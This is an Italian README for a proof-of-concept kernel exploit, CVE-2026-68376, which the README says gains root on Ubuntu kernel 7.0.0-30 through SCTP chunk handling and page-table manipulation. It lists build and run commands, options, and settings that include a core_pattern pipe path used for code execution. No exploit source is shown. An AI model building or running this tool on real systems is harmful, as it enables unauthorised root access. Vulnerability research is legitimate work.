
Proof-of-concept exploit per CVE-2026-68376 nel kernel Ubuntu 7.0.0-30, che sfrutta la gestione dei chunk SCTP e la manipolazione delle PTE per escalare i privilegi a root.
Questo progetto contiene un exploit Proof-of-Concept (PoC) per CVE-2026-68376, mirato alla versione del kernel Ubuntu 7.0.0-30. L'exploit sfrutta una vulnerabilità nell'implementazione di SCTP (Stream Control Transmission Protocol) per ottenere l'escalation dei privilegi tramite la manipolazione delle Page Table Entry (PTE).
QUESTO STRUMENTO È SOLO A SCOPO EDUCATIVO E DI RICERCA.
CVE-2026-68376-Ubuntu-7.0.0-30-Poc/
├── CVE-2026-68376.go # Main Go source code for the exploit
├── n2p-exploit # Compiled binary executable
├── go.mod # Go module definition
├── .gitignore # Git ignore rules (generated)
└── README.md # This file
# Clone the repository
git clone <repository-url>
cd CVE-2026-68376-Ubuntu-7.0.0-30-Poc
# Build the Go project
go build -o n2p-exploit CVE-2026-68376.go
# Make the binary executable
chmod +x n2p-exploit
./n2p-exploit
./n2p-exploit [OPTIONS] [PID]
# Full exploit execution
./n2p-exploit
# With verbose output
./n2p-exploit --verbose
# Trigger vulnerability only (safe for analysis)
./n2p-exploit --vuln-trigger
# With verbose and vulnerability trigger
./n2p-exploit --vuln-trigger --verbose
# Show banner
./n2p-exploit --banner
# Show current configuration
./n2p-exploit --config
# Run as root helper for specific PID
./n2p-exploit 12345
CVE-2026-68376 riguarda l'implementazione di SCTP nel kernel Linux 7.0.0-30. L'exploit sfrutta una gestione impropria dei chunk SCTP e la manipolazione delle PTE per ottenere l'escalation dei privilegi dallo spazio utente a root.
L'exploit definisce numerose costanti per:
Questo progetto è distribuito con licenza Apache License 2.0 - consultare il file LICENSE per i dettagli.
CVE-2026-68376-Ubuntu-7.0.0-30-Poc
| Opzione | Descrizione |
|---|
--vuln-trigger | Innesca solo la vulnerabilità (nessuna escalation a root) |
--verbose, -V | Abilita l'output dettagliato |
--banner | Visualizza l'arte del banner ASCII |
--help, -h | Visualizza questo messaggio di aiuto |
--version, -v | Visualizza le informazioni sulla versione |
--config | Mostra la configurazione corrente |
PID | Esegui come helper root per il PID specificato |
| Variabile | Predefinito | Descrizione |
|---|
N2P_REPORT_PATH | /tmp/n2p-root-report | Percorso di output del report |
N2P_FLAG_PATH | /flag | Percorso del file flag |
N2P_TUN_DEVICE | /dev/net/tun | Percorso del dispositivo TUN |
N2P_CONSOLE | /dev/console | Percorso del dispositivo console |
N2P_TTY | /dev/ttyS0 | Percorso del dispositivo TTY |
N2P_PROC_EXE | /proc/self/exe | Percorso dell'eseguibile stesso |
N2P_CORE_PATTERN | ` | /proc/%P/fd/666 %P` |
N2P_VERBOSE | (non impostato) | Abilita la modalità dettagliata (1/true/yes) |